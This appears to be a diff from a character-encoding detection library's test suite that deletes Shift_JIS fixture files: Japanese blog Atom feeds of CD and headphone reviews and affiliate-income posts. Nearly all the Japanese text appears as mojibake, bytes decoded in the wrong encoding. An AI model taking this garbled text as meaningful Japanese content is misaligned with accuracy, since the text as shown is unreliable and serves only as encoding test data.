    ‹ָ–F
    ‡¥*נ‹¿‹ָ‘ז9”װƒj’Z’²

    ”­”„³F “ֵEMI
    ”­”„“תF 1998/11/18
    Amazon‚ֵ‚ּ•]‰¿•½‹ֿ’lF 5
    ˆָ‰÷AAmazon‚©‚חˆר—pF
    •]‰¿: 5
    ƒNƒ‰ƒVƒbƒN‰¹y‚ֹƒpƒbƒVƒ‡ƒ“‚נ‹‚‚י‚ָ‚ח
    ’”J‚ֵ•ˆ–‚ֹ’‰ְ‚ָ‰¹y‚גAד•i‚ֵBGM‚ֹg‚¦‚»‚₪‚ָCD‚נ‹‚‚ָ‚¢•‚ֹ‹­‚­‚¨©‚‚µ‚‚·B
    ‰‰‘t‚א‰ּ‚א‚־‚ח‚ֲ‚«‚¬‚‚ָAƒ‚ƒmƒ‰ƒ‹‰¹¹‚©‚ח“`‚ם‚ֱ‚ִ‚­‚י‚ּ‚ֽl¶‚ָ‚ּ‚©B
    l‚ֹ‚ז‚ֱ‚ִ‚ֽ‚±‚ּdת‚ָ‰¹y‚נ‹ך‚µ‚­´‚¶‚י‚©‚א‚µ‚ך‚ָ‚¢B
    21¢‹I‚ֹ¶‚«‚י‰הX‚©‚ח‚ֽ¶‚o‚µ“¾‚ָ‚¢—‚ּA‚½‚¢‚ײ‚ס–§“x‚ּ‚‚¢ƒXƒe[ƒW‚×J‚טL‚°‚ח‚ך‚‚·B
    ‰¹¿‚ֽ´“T‚ּ‘ד”wi‚נl—¶‚·‚י•K—v‚ׂ ‚ט‚‚·‚×CD‚ֶ‚µ‚ִˆ‚µ‚ִˆ«‚­‚ֽ‚ָ‚¢‚ֵ‚·B
    ‚±‚ּ‚b‚c‚נ’®‚¢‚ִA„‚ֽ‚‚³‚ֹ‚±‚₪‚¢‚₪‰¹y‚נ‹‚‚ִ‚¢‚½‚ּ‚¾‚ֶv‚¢’m‚ט‚‚µ‚½B‚±‚ך‚ֽ”‚ ‚י‰¹y‚ּA‚׀‚ֶ‚ֲ‚ּ’¸“_‚ָ‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B



    ]]> - -
    -
    - -ƒ^ƒ_‚ֵ“¾‚·‚י‚‚ס‚ױ‚­“‡ - -2005-11-20T00:06:05Z -2005-11-20T00:02:59Z -tag:blog.paseri.ne.jp,2005://2.69 -2005-11-20T00:02:59Z -–ˆ“ת‚R‚O‚O‰~‚ד–‚½‚יƒ`ƒƒƒ“ƒX‚ׂא‚ח‚¦‚‚·B ‚ ‚­‚‚ֵ‚אuƒ`ƒƒƒ“ƒXv‚ֵ‚·‚×EEEE... - -usukage - -usukage@paseri.ne.jp - -‚¨‹א - -–ˆ“ת‚R‚O‚O‰~‚ד–‚½‚יƒ`ƒƒƒ“ƒX‚ׂא‚ח‚¦‚‚·B
    -‚ ‚­‚‚ֵ‚אuƒ`ƒƒƒ“ƒXv‚ֵ‚·‚×EEEE
    -‚ָ‚¢‚ז‚ט‚ֽ‚ ‚ֱ‚½‚‚₪‚ׂז‚¢‚ֵ‚·‚ֻB‚ ‚½‚ט‚‚¦

    - -

    ‚אA‚¨¬­‚¢‚אAƒ^ƒ_‚ֵ“¾‚·‚י‚‚ס‚ױ‚­“‡

    ]]> - -
    -
    - -‰­’Pˆ‚ּ‚¨‹א‚×–׳‚©‚י‚ֶ‚¢‚₪˜b‚א‚ ‚ט‚‚·‚×EEEE - -2005-10-20T09:10:51Z -2005-10-20T09:07:31Z -tag:blog.paseri.ne.jp,2005://2.66 -2005-10-20T09:07:31Z -•s“®Y“‘E”®“‘E‹N‹ֶE‰ןv‚ּ‚¨‚·‚·‚ƒZƒ~ƒi[I ׳‚ֽ¡‚·‚® ƒRƒR‚נƒNƒƒb... - -usukage - -usukage@paseri.ne.jp - - - -•s“®Y“‘E”®“‘E‹N‹ֶE‰ןv‚ּ‚¨‚·‚·‚ƒZƒ~ƒi[I


    -׳‚ֽ¡‚·‚® ƒRƒR‚נƒNƒƒbƒNI
    -

    ]]> - -
    -
    - -י“`”ן‚O‰~‚ֵ¡“ת‚©‚ח‰ׂ‚°‚י‹ֱˆ‚ּ•–@ - -2005-10-19T11:59:11Z -2005-10-19T11:54:28Z -tag:blog.paseri.ne.jp,2005://2.65 -2005-10-19T11:54:28Z -‚¢‚כ‚¢‚כ‚ָ‚±‚ֶ‚נl‚¦‚יl‚ׂ¢‚יƒ‚ƒ“‚¾‚ָ‚ ‚ֶ‚¢‚ֲ‚א´S‚·‚י‚ּ‚ֵ‚·‚×Aי“`”ן‚O‰~‚ֵ¡... - -usukage - -usukage@paseri.ne.jp - -‚¨‹א - -‚¢‚כ‚¢‚כ‚ָ‚±‚ֶ‚נl‚¦‚יl‚ׂ¢‚יƒ‚ƒ“‚¾‚ָ‚ ‚ֶ‚¢‚ֲ‚א´S‚·‚י‚ּ‚ֵ‚·‚×Aי“`”ן‚O‰~‚ֵ¡“ת‚©‚ח‰ׂ‚°‚י‹ֱˆ‚ּ•–@‚ֶ‚¢‚₪‚ּ‚ׂ ‚ט‚‚·B
    -‚ג‚ֱ‚½ƒ‚ƒ“‚¿‚ֱ‚ִ‚¢‚₪˜b‚ֽ‚¯‚ֱ‚±‚₪‚ ‚ט‚‚·‚ז‚ֻB
    -

    ]]> - -
    -
    - -CDFֲ‚¢ƒxƒ“ƒ` - -2005-10-11T14:07:31Z -2005-10-11T14:03:23Z -tag:blog.paseri.ne.jp,2005://2.64 -2005-10-11T14:03:23Z - ֲ‚¢ƒxƒ“ƒ` ... - -usukage - -usukage@paseri.ne.jp - - - -
    -ֲ‚¢ƒxƒ“ƒ`
    -

    ]]> - -
    -
    - -ƒZƒuƒ“ƒCƒƒuƒ“‚ֵiPodƒiƒmEEE - -2005-10-11T12:07:31Z -2005-10-11T12:00:20Z -tag:blog.paseri.ne.jp,2005://2.63 -2005-10-11T12:00:20Z -‚א‚₪‚·‚®AƒZƒuƒ“ƒCƒƒuƒ“‚ֵiPod‚×”ƒ‚¦‚¿‚ב‚₪‚ס‚ֵ‚·‚ֻB ... - -usukage - -usukage@paseri.ne.jp - -PCײ˜A - -‚א‚₪‚·‚®AƒZƒuƒ“ƒCƒƒuƒ“‚ֵiPod‚×”ƒ‚¦‚¿‚ב‚₪‚ס‚ֵ‚·‚ֻB

    - -


    -

    ]]> - -
    -
    - -‚·‚²‚­“—ֽ‚µ‚ג‚·‚¢‚ֶ‚¢‚₪‰\‚ּ“ƒvƒ‚ּƒL[ƒ{[ƒh - -2005-10-09T14:04:13Z -2005-10-09T14:00:16Z -tag:blog.paseri.ne.jp,2005://2.60 -2005-10-09T14:00:16Z -“ƒvƒ Realforce 89 (ND0100) T—×:“ת–{ך89ƒL[ƒ{[ƒh‰¿... - -usukage - -usukage@paseri.ne.jp - -PCײ˜A - -“ƒvƒ
    -Realforce 89 (ND0100)
    -icon
    -T—×:“ת–{ך89ƒL[ƒ{[ƒh
    ‰¿i:17,009(ֵ)
    ֹ:זס
    w“‚נ“¢‚·‚י

    ]]> - -
    -
    - -ƒuƒ‰[ƒ€ƒX:ל•iW(2) - -2005-10-09T11:52:08Z -2005-10-09T10:06:49Z -tag:blog.paseri.ne.jp,2005://2.51 -2005-10-09T10:06:49Z -ƒuƒ‰[ƒ€ƒX:ל•iW(2) ‰‰‘tF ƒxƒ‹ƒƒ“EƒtƒBƒ‹ƒn[ƒ‚ƒj[ַ·y’cƒJƒ‰ƒ„ƒ“(... - -usukage - -usukage@paseri.ne.jp - -ƒNƒ‰ƒVƒbƒNCD - -ƒuƒ‰[ƒ€ƒX:ל•iW(2)


    ‰‰‘tF
    ƒxƒ‹ƒƒ“EƒtƒBƒ‹ƒn[ƒ‚ƒj[ַ·y’c
    ƒJƒ‰ƒ„ƒ“(ƒwƒ‹ƒxƒ‹ƒgEƒtƒHƒ“)
    ƒuƒ‰[ƒ€ƒX

    ‹ָ–F
    נ‹¿‹ָ‘ז1”װƒn’Z’² ל•i68

    ”­”„³F ƒ†ƒjƒo[ƒTƒ‹ƒNƒ‰ƒVƒbƒN
    ‰¿iF 1,500
    ”­”„“תF 2005/03/23

    ]]> - -
    -
    - -<![CDATA[ˆ«—ל ƒnƒEƒXEƒIƒuEƒfƒ‚ƒ“ƒY <DVD”ֵ>]]> - -2005-10-09T11:53:07Z -2005-10-09T10:06:49Z -tag:blog.paseri.ne.jp,2005://2.53 -2005-10-09T10:06:49Z - ”­”„³F ƒrƒfƒIƒ[ƒJ[ ‰¿...]]> - -usukage - -usukage@paseri.ne.jp - - - - ˆ«—ל ƒnƒEƒXEƒIƒuEƒfƒ‚ƒ“ƒY <DVD”ֵ>


    ”­”„³F ƒrƒfƒIƒ[ƒJ[
    ‰¿iF 3,990
    Amazon‚ֵ‚ּƒ†[ƒYƒh‰¿iF 1,980
    ”­”„“תF 2001/04/13

    ]]> - -
    -
    - -ƒZƒ‹‚ּƒ`ƒƒƒCƒRƒtƒXƒL[I : נ‹¿‹ָ‘ז5”װƒz’Z’² - -2005-06-30T13:03:36Z -2005-06-30T13:01:19Z -tag:blog.paseri.ne.jp,2005://2.41 -2005-06-30T13:01:19Z -ƒ`ƒƒƒCƒRƒtƒXƒL[ : נ‹¿‹ָ‘ז5”װƒz’Z’² ƒ`ƒƒƒCƒRƒtƒXƒL[ : נ‹¿‹ָ‘ז5”װƒz’Z... - -usukage - -usukage@paseri.ne.jp - - - -ƒ`ƒƒƒCƒRƒtƒXƒL[ : נ‹¿‹ָ‘ז5”װƒz’Z’²
    ƒ`ƒƒƒCƒRƒtƒXƒL[ : נ‹¿‹ָ‘ז5”װƒz’Z’²


    ‰‰‘tF
    ƒNƒ[ƒ”ƒ‰ƒ“ƒhַ·y’c
    ƒ`ƒƒƒCƒRƒtƒXƒL[
    ƒZƒ‹(ƒWƒ‡[ƒW)

    ‹ָ–F
    נ‹¿‹ָ‘ז5”װƒz’Z’²op64
    ƒCƒ^ƒƒAן‘z‹ָop45

    ”­”„³F ƒ\ƒj[ƒ~ƒ…[ƒWƒbƒNƒGƒ“ƒ^ƒeƒCƒ“ƒƒ“ƒg
    ‰¿iF 1,646
    ”­”„“תF 1995/08/21
    Amazon‚ֵ‚ּ•]‰¿•½‹ֿ’lF 5
    ˆָ‰÷AAmazon‚©‚חˆר—pF
    •]‰¿: 5
    ‘ז2yֽ‚נ’®‚¯I‚«‚ֱ‚ֶ‘ו״‚ֹ‚µ‚½‚­‚ָ‚י‰‰‘tB
    ƒ`ƒƒƒCƒRƒtƒXƒL[‚ֶ‚¢‚₪‚ֶA‚¨—’¸‘ױ‚ּ‰‰‘t‚×Aˆ³“|“I‚ֹ‘½‚¢B‚»‚ס‚ָ‚b‚cAˆך‰ס’®‚­‚ֶ–O‚«‚¿‚ב‚₪‚ס‚¾‚ז‚ֻBƒ€ƒ‰ƒrƒ“ƒXƒL[‚ּ‰‰‘t‚ׂ¢‚ֲ‚‚ֵ‚אx‚³‚ך‚י‚ּ‚ֽA—ג‚ֵ“ֻ‚«•ת‚µ‚½”‚ּ«i‚׃I[ƒPƒXƒgƒ‰‚ּyˆץ‚ֹ\•×Z“§‚µ‚ִ‚¢‚ִAyˆץ‘Sˆץ‚×”‚µ‚¢ƒƒƒfƒB[‚ֹ‚¢‚µ‚ך‚י‚ה‚ֶ‚ט‚×–³‚¢‚©‚ח‚¾A‚ֶv‚₪‚ּ‚ֽװˆב‚¢‚©‚µ‚חBƒZƒ‹‚ּ5”װB‹ָ‚ֹ‘־‚·‚יƒCƒ[ƒW‚וֿ‚ם‚י‚ֻB‘ז2yֽ‚ּAƒAƒ“ƒ_ƒ“ƒeEƒJƒ“ƒ^[ƒrƒBˆֳ‚¢·‚ּ˜‘t‚ּד‚ּƒzƒ‹ƒ“‚×o‚י‚ֶ‚±‚כB‚ָ‚ס‚ֶ‚·‚־‚ח‚µ‚¢Aƒeƒ“ƒ|‚ֶ‹ָ‘zB‚±‚±‚נ’®‚­‚¾‚¯‚ֵ‚אA‰¿’l‚ּ‚ ‚י‰‰‘t‚ֵ‚·‚ֻBƒ`ƒƒƒCƒRƒtƒXƒL[‚׋ךט‚¾‚ֱ‚½„‚ּA‚¢‚ֲ‚‚ֵ‚א‘ו״‚ֹ‚µ‚½‚¢‚b‚cB

    •]‰¿: 5
    –¾‚י‚¢–¼‰‰‘t
    @‚±‚ּ‚T”װ‚ֽA‰“x‚ָ´‚נ”נ‚¯A‚±‚ּ‹ָ“ֱ—L‚ּd‚½‚¢ƒCƒ[ƒW‚נ‚ ‚‚ט´‚¶‚³‚¹‚¸A‚»‚ך‚ֵ‚¢‚ִˆ‚µ‚ִ–³‹@¿‚ֵ‚ֽ‚ָ‚¢B
    @ƒZƒ‹‚ֹ‚ז‚ט’b‚¦‚‚©‚ך‚½ƒI[ƒPƒXƒgƒ‰‚ֽA‘ז‚Qyֽ‚ֵ”‚µ‚¢ש—¥‚נ–L‚©‚ֹ‘t‚ֵ‚½‚©‚ֶv‚₪‚ֶAˆך“]AIyֽ‚ֵ‚ֽˆך…—‚ך‚’´l“I‚ָƒAƒ“ƒTƒ“ƒuƒ‹‚ֵ•·‚«ט‚נˆ³“|‚·‚יB

    @ƒCƒ^ƒƒAן‘z‹ָ‚ֵ‚א®אר‚ָƒAƒ“ƒTƒ“ƒuƒ‹‚ֶ’´ג‹ZI‚׬”\‚ֵ‚«A‚µ‚©‚אy‚µ‚¢B‚±‚ס‚ָ‰‰‘t‚ֽ‘¼‚ֹ—‚ָׂ‚¢B
    @’®‚«I‚¦‚½‚ ‚ֶ“K“x‚ָ‹»•±‚ֶ‘u‚ג‚©‚ָˆף‚×c‚יB¡‚¾‚ֹFוע‚¹‚ָ‚¢–¼”ױ‚ֵ‚ ‚יB



    ]]> - -
    -
    - -ƒ}[ƒ‰[:נ‹¿‹ָ‘ז9”װ - -2005-06-30T12:55:29Z -2005-06-30T12:53:55Z -tag:blog.paseri.ne.jp,2005://2.40 -2005-06-30T12:53:55Z -ƒ}[ƒ‰[:נ‹¿‹ָ‘ז9”װ ƒ}[ƒ‰[:נ‹¿‹ָ‘ז9”װ ‰‰‘tF ƒƒCƒ„ƒ‹EƒRƒ“ƒZƒ‹ƒgƒw... - -usukage - -usukage@paseri.ne.jp - - - -ƒ}[ƒ‰[:נ‹¿‹ָ‘ז9”װ
    ƒ}[ƒ‰[:נ‹¿‹ָ‘ז9”װ


    ‰‰‘tF
    ƒƒCƒ„ƒ‹EƒRƒ“ƒZƒ‹ƒgƒwƒ{ƒEַ·y’c
    ƒVƒƒƒC[(ƒƒbƒJƒ‹ƒh)
    ƒ}[ƒ‰[

    ‹ָ–F
    נ‹¿‹ָ‘ז9”װƒj’·’²
    נ‹¿‹ָ‘ז9”װƒj’·’²

    ”­”„³F ƒ†ƒjƒo[ƒTƒ‹ƒNƒ‰ƒVƒbƒN
    ‰¿iF 3,059
    ”­”„“תF 2004/11/21
    Amazon‚ֵ‚ּ•]‰¿•½‹ֿ’lF 5
    ˆָ‰÷AAmazon‚©‚חˆר—pF
    •]‰¿: 5
    ‚ָ‚ס‚ֶ”‚µ‚¢ƒ}[ƒ‰[‚ּ‘ז9I
    ‘ז4yֽ‚ֽ’·‘ו‚ֵ’‚‚ָƒAƒ_[ƒWƒ‡Bƒuƒ‹[ƒmEƒƒ‹ƒ^[‚ֽA‚±‚ּyֽ‚נuֲ‹ף‚ֹ‚ֶ‚¯‚ִ‚ה‚­”’‰_v‚ֶך‚ֱ‚½B™z‚ֶ‚µ‚½”‚µ‚³‚ֹ‚¢‚½‚¢–¼‹ָ‚¾B< P>‚¾‚ׂ±‚ּ‹ָ‚ֽƒNƒ‰ƒVƒbƒN‰Sׂ‚¯‚ּ‹ָ‚ֵ‚ֽ‚ָ‚¢‚¾‚כ‚₪B
    ƒ}[ƒ‰[‚ּ‹“¡‚ֶג–]A‹ך”Y‚נ“ֻ‚«”²‚¯‚½ƒx[ƒg[ƒ”ƒFƒ“‚×½ל‚ֹ‚ֱ‚½‚ּ‚ֹ‘־‚µAƒ}[ƒ‰[‚×’H‚ט‚ֲ‚¢‚½‚ּ‚ֽu¶‚ֽˆֳ‚­A€‚א‚‚½ˆֳ‚¢v‚ֶ‚¢‚₪ֽ’W‚ּ”‚ֵ‚ ‚יB
    ‚»‚µ‚ִ‚±‚ּנ‹¿‹ָ‚ֽ‚»‚ס‚ָ¶‚ּ“ֻ‚«‹l‚‚ח‚ך‚½‹“_‚ֹ‘¶‚·‚יB

    ƒVƒƒƒC[•ƒRƒ“ƒZƒ‹ƒgƒwƒ{ƒE‚ּ‰©‹אƒRƒ“ƒr‚ּƒ}[ƒ‰[Eƒ`ƒNƒ‹ƒX‚ֵּד‚נ‚י˜^‰¹‚ֶ‚ָ‚ֱ‚½‚×A‚׃‚³‚ם‚µ‚¢”‰‰‚¾B
    “§–¾‚©‚ֲ’^”“I‚ָƒ}[ƒ‰[B28•׈ָד‚©‚¯‚½‘s‘ו‚ָƒAƒ_[ƒWƒ‡¥ƒtƒBƒi[ƒ‚ֽ‘¬‚¢ƒu[ƒ[ƒY”ֵ‚ז‚ט7•ׂא’·‚¢B< BR>‚»‚ך‚ֵ‚¢‚ִ‘±‚·‚י‹’£´‚ׂ ‚טC‰}¢“IC’^”“I‚ָ[‚‚ׂה‚ֱ‚­‚ט‚ֶ‘‚µ‚ִ‚¢‚­B˜^‰¹‚א‚·‚²‚­‚¢‚¢B
    ƒ}[ƒ‰[‚ּ‘ז9‚¾‚©‚חA‚ֶ‚׀‚½‚·‚חˆֳ‚­d‚­‰‰‘t‚·‚י‚ּ‚×ו—¬‚ֶv‚₪‚×AƒVƒƒƒC[‚ּƒ}[ƒ‰[‘‚ֽב±ˆב‚₪B
    ’®‚«ט‚ֽƒƒtƒƒbƒVƒ…‚³‚¹‚ח‚ך‚י‚¾‚כ‚₪B‚»‚ּ”‚µ‚¢‰¹F‚ֶƒTƒEƒ“ƒh‚׈ֳ‚¢–י‹ף‚ֹA–“_‚ּ¯‹ף‚נ•`‚«o‚µ‚ִ‚¢‚יB

    ‚¿‚ָ‚‚ֹƒEƒfƒBEƒAƒƒ“‚ּu•v‚½‚¿Aָ‚½‚¿vAƒSƒ_[ƒ‹‚ּuƒ}ƒƒAv‚ָ‚ַ‚ֵ‚±‚ּ‹ָ‚×g‚ם‚ך‚ִ‚¢‚י



    ]]> - -
    -
    - -Pioneer SE-M570 –§•ֲ^ƒ_ƒCƒiƒ~ƒbƒNƒXƒeƒƒIƒwƒbƒhƒzƒ“ - -2005-06-30T12:53:47Z -2005-06-30T12:52:10Z -tag:blog.paseri.ne.jp,2005://2.39 -2005-06-30T12:52:10Z -Pioneer SE-M570 –§•ֲ^ƒ_ƒCƒiƒ~ƒbƒNƒXƒeƒƒIƒwƒbƒhƒzƒ“ Pione... - -usukage - -usukage@paseri.ne.jp - - - -Pioneer SE-M570 –§•ֲ^ƒ_ƒCƒiƒ~ƒbƒNƒXƒeƒƒIƒwƒbƒhƒzƒ“
    Pioneer SE-M570 –§•ֲ^ƒ_ƒCƒiƒ~ƒbƒNƒXƒeƒƒIƒwƒbƒhƒzƒ“


    ”­”„³F ƒpƒCƒIƒjƒA
    ‰¿iF 4,480
    ”­”„“תF 1999/10/21
    Amazon‚ֵ‚ּ•]‰¿•½‹ֿ’lF 4
    ˆָ‰÷AAmazon‚©‚חˆר—pF
    •]‰¿: 4
    ‚»‚±‚»‚±—ַ‚¢‚ֶv‚₪
    ‚‹‰‚ָƒwƒbƒhƒtƒHƒ“‚ֶ‚ֽ’l’i‚׈ב‚₪‚ּ‚ֵ•¨¦‚­‰¹¿‚×—ַ‚¢‚ֶ‚ֽ¾‚¦‚‚¹‚סB@@‚µ‚©‚µƒRƒXƒgƒpƒtƒH[ƒ}ƒ“ƒX‚ֶ‚¢‚₪“_‚ֵ‚ֽA‚ָ‚©‚ָ‚©—ַ‚¢‰¹‚נo‚µ‚ִ‚י‚ס‚¶‚ב‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B@@•״‚ך‚ּ—ַ‚¢‰¹‚ֵ‘S‘ּ“I‚ָ‰¹‚ֽ‚‚ ‚‚ ‚ֵ‚·B@@‚‹‰‹@‚ֹ”ה‚׳‚י‚ֶ‘½­ƒSƒ`ƒƒƒSƒ`ƒƒ‚µ‚½‰¹‚ֹ’®‚±‚¦‚י‚©‚א’m‚ך‚‚¹‚ס‚×A‹t‚ֹ‚»‚±‚‚ֵ‚±‚¾‚ם‚יl‚ֽ‚א‚ֱ‚ֶ‚‚¢‚ּ”ƒ‚ֱ‚ִ‚­‚¾‚³‚¢B@@„ֲl‚ּ´‘z‚ֽ‚QC‚O‚O‚O`‚RC‚O‚O‚O‰~‘ה‚ּ•¨‚נ”ƒ‚₪‚ָ‚ח‚±‚ּƒwƒbƒhƒtƒHƒ“‚ּ•‚×—ַ‚¢‚ֶv‚¢‚‚·B@@‰¹¿‚ּ–‚ֵ‚א‚±‚ּ’l’i‚ָ‚ח‹\–‘«o—ˆ‚י‚ֶv‚¢‚‚·B@@‚¿‚ָ‚‚ֹƒnƒEƒWƒ“ƒOiƒXƒs[ƒJ[•”•×j‚×”½“]‚µ‚‚¹‚ס‚ּ‚ֵ•׀¨ƒ‚ƒjƒ^[‚ֽo—ˆ‚‚¹‚סB

    •]‰¿: 4
    ”סם‚ֹg‚¢ט‚ּƒCƒCA—ַƒwƒbƒhƒzƒ“I
    ‚»‚ּ©‚½–‚ּ’†“r”¼’[‚³‚©‚ח‚ֽl‚¦‚ח‚ך‚ָ‚¢‚ז‚₪‚ָ—ַ¿‚ּƒwƒbƒhƒzƒ“B
    M380‚ּ’טˆ´‚נˆר‚«p‚¬‚ָ‚ׂחA•ֿ‚ָגִ‚א‚ט‚ג’בˆזס‚ט‚ּ‰¹‚ָׂ‚­‚ָ‚ט’N‚ֹ‚ֵ‚א©‚‚ח‚ך‚יg‚¢‚ג‚·‚¢ƒwƒbƒhƒzƒ“‚ֹ‚ָ‚ֱ‚ִ‚¢‚יB
    ‚‰¹‚©‚ח’ב‰¹‚‚ֵ‰•s‘«‚ָ‚­–ֲ‚יˆ׳A‰B‚ך‚½—ַ¿‚ּƒwƒbƒhƒzƒ“‚¾‚ֶv‚₪B
    ‚¨‚»‚ח‚­´ˆצ‚ֽƒfƒUƒCƒ“‚ֶv‚₪‚ּ‚ֵA•װ‚·•װ‚·‚אO©‚ּ’†“r”¼’[‚³‚×c”OB

    ’ט”װ‰»‚µ‚ִ‚א‚¨‚©‚µ‚­‚ָ‚¢ְ—ֽB


    ]]> - -
    -
    - -’†‰›‹£”nG1ƒ[ƒX‘W•ׂ1992 DVD - -2005-06-30T12:49:38Z -2005-06-30T12:45:46Z -tag:blog.paseri.ne.jp,2005://2.38 -2005-06-30T12:45:46Z -’†‰›‹£”nG1ƒ[ƒX‘W•ׂ1992 DVD ’†‰›‹£”nG1ƒ[ƒX‘W•ׂ1992 DV... - -usukage - -usukage@paseri.ne.jp - - - -’†‰›‹£”nG1ƒ[ƒX‘W•ׂ1992 DVD
    ’†‰›‹£”nG1ƒ[ƒX‘W•ׂ1992 DVD


    ”­”„³F ƒ|ƒj[ƒLƒƒƒjƒIƒ“
    Amazon‚ֵ‚ּƒ†[ƒYƒh‰¿iF 1,880
    ”­”„“תF 2000/01/19
    Amazon‚ֵ‚ּ•]‰¿•½‹ֿ’lF 4
    ˆָ‰÷AAmazon‚©‚חˆר—pF
    •]‰¿: 4
    I–ׁ‚ּ‰צ•¨
    ““I‚ֹ‚א‚ ‚‚ט–—§‚½‚ָ‚¢‚P“ּׂI–ׁ‚ּ‰²”n‚׃Nƒ‰ƒVƒbƒN‚ּ’†S‚ֶ‚ָ‚ֱ‚½‚P‚X‚X‚Q”NB‚»‚₪‚ֵ‚·AֻּR’²‹³t‚ּƒXƒpƒ‹ƒ^’²‹³‚ֵˆח‚ִ‚ח‚ך‚½ƒ~ƒzƒmƒuƒ‹ƒ{ƒ“‚׈–פ‚·‚י‚P”N‚ֵ‚µ‚½B¡‚ֵ‚א‚ ‚ּ‹e‰װ‚ּƒ[ƒX‚ֽ–Y‚ך‚ח‚ך‚‚¹‚סB‚ֱ‚ִ—~‚µ‚©‚ֱ‚½DDDDDD


    ]]> - -
    -
    - -ƒx[ƒg[ƒ”ƒFƒ“ (ƒƒXƒg•ׂ‹ָ) : נ‹¿‹ָ‘ז7”װ - -2005-06-29T10:39:38Z -2005-06-29T10:37:55Z -tag:blog.paseri.ne.jp,2005://2.37 -2005-06-29T10:37:55Z -ƒx[ƒg[ƒ”ƒFƒ“ (ƒƒXƒg•ׂ‹ָ) : נ‹¿‹ָ‘ז7”װ ƒx[ƒg[ƒ”ƒFƒ“ (ƒƒXƒg•ׂ‹ָ)... - -usukage - -usukage@paseri.ne.jp - - - -ƒx[ƒg[ƒ”ƒFƒ“ (ƒƒXƒg•ׂ‹ָ) : נ‹¿‹ָ‘ז7”װ
    ƒx[ƒg[ƒ”ƒFƒ“ (ƒƒXƒg•ׂ‹ָ) : נ‹¿‹ָ‘ז7”װ


    ‰‰‘tF
    ƒJƒcƒ@ƒƒX(ƒVƒvƒƒAƒ“)
    ƒx[ƒg[ƒ”ƒFƒ“
    ƒƒXƒg
    ƒVƒ…[ƒ}ƒ“

    ‹ָ–F
    נ‹¿‹ָ‘ז7”װƒC’·’²op92(ƒƒXƒg•ׂ)ƒVƒ…[ƒ}ƒ“:
    —K‹ָWWoO31(ƒx[ƒg[ƒ”ƒFƒ“‚ּו‘ט-נ‹¿‹ָ‘ז7”װ‘ז2yֽ-‚ֹ‚ז‚י©—R‚ָ•ֿ‘t‹ָ`®‚ּ—K‹ָ)

    ”­”„³F ƒ[ƒi[ƒ~ƒ…[ƒWƒbƒNEƒWƒƒƒpƒ“
    ‰¿iF 1,050
    ”­”„“תF 1999/11/25
    Amazon‚ֵ‚ּ•]‰¿•½‹ֿ’lF 4
    ˆָ‰÷AAmazon‚©‚חˆר—pF
    •]‰¿: 4
    ‚ָ‚©‚ָ‚©‚ֵ‚·B
    נ‹¿‹ָ‚נƒsƒAƒm‹ָ‚ֵ’®‚­‚ּ‚ֽ‚ַ‚ס‚ָ‚א‚ּ‚©‚ֶv‚ֱ‚ִ‚¢‚½‚×A”סם‚ֹ‚ם‚©‚ט‚ג‚·‚­A‰‰‘tׂ‚ּˆ׃}‚×–¾m‚ֹ“`‚ם‚טA‚ָ‚©‚ָ‚©‚ּ‚א‚ּ‚ֵ‚µ‚½B
    ƒsƒAƒm•ׂ‹ָ”ֵ‚ֵ‚אƒI[ƒPƒXƒgƒ‰‚ֹˆר‚¯‚נז‚ח‚ָ‚¢•\»—ֽ‚נo‚µ‚ִ‚¢‚י‚ּ‚ֽA‚³‚·‚×Katsaris‚ֶ‚¢‚₪´‚¶‚ֵ‚µ‚½B



    ]]> - -
    -
    - -ATH-PRO30BK –§•ֲ^ƒwƒbƒhƒzƒ“ - -2005-06-29T10:37:47Z -2005-06-29T10:36:15Z -tag:blog.paseri.ne.jp,2005://2.36 -2005-06-29T10:36:15Z -ATH-PRO30BK –§•ֲ^ƒwƒbƒhƒzƒ“ ATH-PRO30BK –§•ֲ^ƒwƒbƒhƒz... - -usukage - -usukage@paseri.ne.jp - - - -ATH-PRO30BK –§•ֲ^ƒwƒbƒhƒzƒ“
    ATH-PRO30BK –§•ֲ^ƒwƒbƒhƒzƒ“


    ”­”„³F ƒI[ƒfƒBƒIƒeƒNƒjƒJ
    ‰¿iF 2,926
    ”­”„“תF 2004/02/21

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/bloglelife.com.xml b/chardet/tests/SHIFT_JIS/bloglelife.com.xml deleted file mode 100644 index 1156146..0000000 --- a/chardet/tests/SHIFT_JIS/bloglelife.com.xml +++ /dev/null @@ -1,471 +0,0 @@ - - - -ƒuƒƒO‚יƒ‰ƒCƒt - -2005-11-30T11:24:20Z - -tag:www.bloglelife.com,2005://1 -Movable Type -Copyright (c) 2005, wasshari - -2005”N11‚ּ“ - -2005-11-30T11:24:20Z -2005-11-30T11:16:40Z -tag:www.bloglelife.com,2005://1.17 -2005-11-30T11:16:40Z -A8.netiƒG[ƒnƒ`ƒlƒbƒgj4,992Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj6,960Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj10,287‚»‚ּ‘¼4,100‡v\26,339 - -wasshari - - - -“Report - -A8.netiƒG[ƒnƒ`ƒlƒbƒgj4,992Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj6,960Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj10,287‚»‚ּ‘¼4,100‡v\26,339 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@189,155‰~
    -iְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·j

    - -

    ƒT[ƒo[‚ּ•‹‚©‚ח2ƒ–‚‚ַo‚¿‚‚µ‚½‚×A‹L–‚ּ•‹‚ב״‚ֱ‚ִ‚¢‚‚·B
    -‚»‚ּ‚¹‚¢‚©AƒAƒNƒZƒX”‚אL‚ׁ”Y‚ס‚ֵ‚י‚ּ‚×»ף‚ֵ‚·B

    - -

    ƒƒjƒ…[‚ֹ‚ז‚ֱ‚ִ‚ֽAƒy[ƒW‚ּ•\¦‚·‚ח‚³‚ך‚ָ‚¢ף‹µ‚ב±‚¢‚ִ‚¢‚י‚ּ‚ֵA‚ָ‚ס‚ֶ‚©‚µ‚½‚¢‚ֶ‚±‚כ‚ָ‚ס‚ֵ‚·‚×A‚ָ‚©‚ָ‚©‚ֶ‚¢‚ֱ‚½´‚¶‚ֵ‚·B

    - -

